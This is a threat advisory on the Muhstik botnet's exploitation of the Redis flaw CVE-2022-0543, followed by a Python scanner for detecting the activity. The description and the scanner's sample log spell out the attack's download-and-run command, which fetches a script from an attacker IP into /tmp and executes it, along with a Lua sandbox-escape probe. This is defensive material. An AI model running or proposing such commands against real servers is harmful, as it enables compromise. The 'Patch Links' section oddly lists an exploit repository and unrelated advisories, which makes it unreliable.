Muhstik botnet adds another vulnerability exploit to its arsenal
THREAT LEVEL: Red.
Muhstik malware has begun attacking Redis servers by exploiting a recently reported vulnerability, CVE-2022-0543, which affects several Redis Debian packages. The attacks began on March 11, 2022, and are attributed to the same threat actor that targeted Confluence servers in September 2021 and Log4j in December of that year. The payload is a Muhstik bot variant that can be used to carry out DDoS attacks.
The threat actor first runs Lua scripts that exploit the vulnerability in the Redis Debian packages. The actor then attempts to download “Russia.sh” from “106[.]246.224.219” using wget or curl, stores it as “/tmp/russ” and executes it; this script in turn downloads and runs a Linux payload from 160[.]16.58.163. These binaries have been identified as Muhstik bot variants. The bot then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks such as flood attacks and SSH brute-force attacks.
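As an added example (not part of this advisory or the Juniper write-up it cites), a small Python scanner that walks constructed Redis MONITOR output and host shell-audit lines and flags the activity described above: EVAL scripts that reference Lua libraries the Redis sandbox is supposed to hide, wget/curl downloads into /tmp, and the IoCs named in this advisory. The log formats and sample lines are constructed; only the IP addresses and file names come from the text above.

```python
import re

# Indicators taken from the advisory text; the advisory writes them defanged.
IOC_IPS = {"106.246.224.219", "160.16.58.163"}
IOC_NAMES = ("Russia.sh", "/tmp/russ")

# Lua libraries Redis hides from scripts; a script naming them is suspicious
# whatever the exact exploit, so this catches CVE-2022-0543 probes generically.
SANDBOXED_LUA = re.compile(r"\b(package|io|os)\s*[.\[]", re.I)

# Redis MONITOR format: "<ts> [<db> <client-addr>] "CMD" "arg" ..."
MONITOR_LINE = re.compile(
    r'^\d+\.\d+ \[\d+ (?P<client>[^\]]+)\] "(?P<cmd>[A-Za-z]+)"(?P<args>.*)$'
)
DOWNLOAD_TO_TMP = re.compile(r"\b(wget|curl)\b.*/tmp/")


def refang(text):
    """Turn defanged '1[.]2[.]3[.]4' back into a matchable address."""
    return text.replace("[.]", ".")


def classify(line):
    """Return a list of (reason, detail) pairs for one log line; empty if benign."""
    hits = []
    line = refang(line)
    m = MONITOR_LINE.match(line)
    if m and m.group("cmd").upper() in ("EVAL", "EVALSHA", "SCRIPT"):
        if SANDBOXED_LUA.search(m.group("args")):
            hits.append(("lua-sandbox-library", m.group("client")))
    for ip in sorted(IOC_IPS):
        if ip in line:
            hits.append(("ioc-ip", ip))
    for name in IOC_NAMES:
        if name in line:
            hits.append(("ioc-name", name))
    if DOWNLOAD_TO_TMP.search(line):
        hits.append(("download-to-tmp", "wget/curl"))
    return hits


def scan(lines):
    """Map line index -> hits for every line that produced at least one hit."""
    return {i: classify(l) for i, l in enumerate(lines) if classify(l)}


# Constructed sample log: two Redis MONITOR lines, two shell-audit lines, one benign EVAL.
SAMPLE_LOG = [
    '1647000000.000001 [0 10.0.0.5:40512] "SET" "k" "v"',
    '1647000000.000002 [0 198.51.100.7:51234] "EVAL" "return os.getenv(\'HOME\')" "0"',
    "Mar 11 10:02:03 redis01 sh[2231]: wget http://106[.]246.224.219/Russia.sh -O /tmp/russ",
    "Mar 11 10:02:05 redis01 sh[2231]: /tmp/russ",
    '1647000000.000003 [0 10.0.0.5:40512] "EVAL" "return redis.call(\'get\', KEYS[1])" "1" "k"',
]
```

Feed `scan()` real MONITOR output or auditd/shell logs line by line; the constructed sample is only there so the script runs offline.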
The MITRE ATT&CK tactics and techniques commonly used by Muhstik malware are:
TA0001: Initial Access
TA0011: Command and Control
TA0042: Resource Development
TA0008: Lateral Movement
T1071: Application Layer Protocol
T1588.006: Obtain Capabilities: Vulnerabilities
T1190: Exploit Public-Facing Application
T1021.004: Remote Services: SSH
T1059.004: Command and Scripting Interpreter: Unix Shell
Vulnerability Details
Indicators of Compromise (IoCs)
Patch Links
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://security-tracker.debian.org/tracker/CVE-2022-0543
http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
https://jira.atlassian.com/browse/CONFSERVER-67940
https://logging.apache.org/log4j/2.x/manual/migration.html
References
https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers